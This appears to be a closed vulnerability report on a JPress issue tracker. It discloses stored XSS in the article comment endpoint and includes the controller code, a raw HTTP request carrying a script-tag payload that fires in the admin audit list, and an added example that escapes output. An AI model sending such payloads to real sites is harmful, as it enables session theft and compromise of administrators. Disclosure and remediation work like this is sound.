Closed thiscodecc closed 4 years ago
1. No filtering of the comments on the front-end articles. This place has a stored XSS vulnerability.

Code: io.jpress.module.article.controller.api.ArticleApiController
```java
public void postComment() {
    Long articleId = getParaToLong("articleId");
    Long pid = getParaToLong("pid");
    String content = getRawData();

    if (articleId == null || articleId <= 0) {
        renderFailJson();
        return;
    }

    if (StrUtil.isBlank(content)) {
        renderJson(Ret.fail().set("message", "评论内容不能为空"));
        return;
    } else {
        content = StrUtil.escapeHtml(content);
    }

    Article article = articleService.findById(articleId);
    if (article == null) {
        renderFailJson();
        return;
    }

    // Comments have been disabled for this article
    if (!article.isCommentEnable()) {
        renderJson(Ret.fail().set("message", "该文章的评论功能已关闭"));
        return;
    }

    // Is the comment feature enabled globally
    Boolean commentEnable = optionService.findAsBoolByKey("article_comment_enable");
    if (commentEnable == null || commentEnable == false) {
        renderJson(Ret.fail().set("message", "评论功能已关闭"));
        return;
    }

    User user = getLoginedUser();
    if (user == null) {
        renderJson(Ret.fail().set("message", "用户未登录"));
        return;
    }

    ArticleComment comment = new ArticleComment();
    comment.setArticleId(articleId);
    comment.setContent(content);
    comment.setPid(pid);
    comment.setEmail(user.getEmail());
    comment.setUserId(user.getId());
    comment.setAuthor(user.getNickname());
    comment.put("user", user.keepSafe());

    // Whether an administrator must review comments before they are published
    Boolean reviewEnable = optionService.findAsBoolByKey("article_comment_review_enable");
    if (reviewEnable != null && reviewEnable == true) {
        comment.setStatus(ArticleComment.STATUS_UNAUDITED);
    }
    /**
     * No administrator review required, publish directly
     */
    else {
        comment.setStatus(ArticleComment.STATUS_NORMAL);
    }

    // Record the article's comment count
    articleService.doIncArticleCommentCount(articleId);

    if (pid != null) {
        // Record the number of replies to the parent comment
        commentService.doIncCommentReplyCount(pid);
    }

    commentService.saveOrUpdate(comment);

    Ret ret = Ret.ok();
    if (comment.isNormal()) {
        ret.set("comment", comment).set("code", 0);
    } else {
        ret.set("code", 0);
    }
    renderJson(ret);

    ArticleKit.doNotifyAdministrator(article, comment, user);
}
```
Payload:

```http
POST /article/postComment HTTP/1.1
Host: thiscode.cc:8080
Content-Length: 54
Accept: */*
Origin: http://thiscode.cc:8080
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: BEEFHOOK=OIQ9kdw1dWWmTkd3EOxKodjVpHIynv6C3kEwio8YBIVnvuQNHFkFV9QyrURnHKFB1ZAEfNptsL7fvOZT; Hm_lvt_b023b8f407cc8a64265fb326a375c029=1569300497; _jpanonym="OWZmNmYyOWYwZjU5NDI3MzQ4MGI5MDc2YTAxYzQzNTQjMTU3MDExMTUyMDczMiMzMTUzNjAwMCNOR05pTXpOaFpUTXhNek0zTkRrM01UaGtNek16TVRBd1pUZzROV1JrWVRBPQ=="; _jpuid="MGYyMjBkMDZiY2Q4ZWNhYWQxYTkzNjZhMWZjZjRlNGUjMTU3MDExMTU0NTIwMiM2MDQ4MDAjTVE9PQ=="; Hm_lvt_bfe2407e37bbaa8dc195c5db42daf96a=1570111546; csrf_token=3ead8a2246874de6a1ebe991b807027d; Hm_lpvt_bfe2407e37bbaa8dc195c5db42daf96a=1570113168
Connection: close

articleId=2&pid=&content=<script>alert('xss')</script>
```
Auditing the comment list in the admin back-end triggers the vulnerability.

Screenshot:

Back-end filtering or front-end output filtering: convert the content to HTML entities.

Asking the author to fix this vulnerability. Thanks.
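The fix the report recommends, as an added example that is not JPress's own code: comment content is converted to HTML entities at the point where the admin audit list renders it, so the stored payload shown above is displayed as text rather than executed. The `escapeHtml` helper and `renderAuditRow` are constructed here as stand-ins and are not the project's `StrUtil.escapeHtml`.

```java
/** Added example: HTML-entity encoding applied to comment content on output. */
public class CommentEscapeDemo {

    // Minimal HTML entity encoder (assumption: stands in for a library call such as
    // StrUtil.escapeHtml; it is not the project's implementation).
    static String escapeHtml(String s) {
        if (s == null) return "";
        StringBuilder sb = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  sb.append("&amp;");  break;
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#39;");  break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }

    // Renders one row of the admin audit list. Author and content are inserted as
    // text, never as markup, so a stored payload cannot become a script element.
    static String renderAuditRow(String author, String content) {
        return "<tr><td>" + escapeHtml(author) + "</td><td>"
             + escapeHtml(content) + "</td></tr>";
    }

    public static void main(String[] args) {
        // Constructed sample: the payload from the report as it would sit in the database
        // if the submission path stored it unfiltered.
        String stored = "<script>alert('xss')</script>";
        String row = renderAuditRow("tester", stored);
        System.out.println(row);
        // Sanity check: no tag may survive encoding.
        if (row.contains("<script")) {
            throw new IllegalStateException("unescaped markup in output");
        }
    }
}
```

Encoding at render time covers comments that were stored before the input-side escape existed; encoding only at submission time leaves those rows exploitable.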
Closed in version 3.0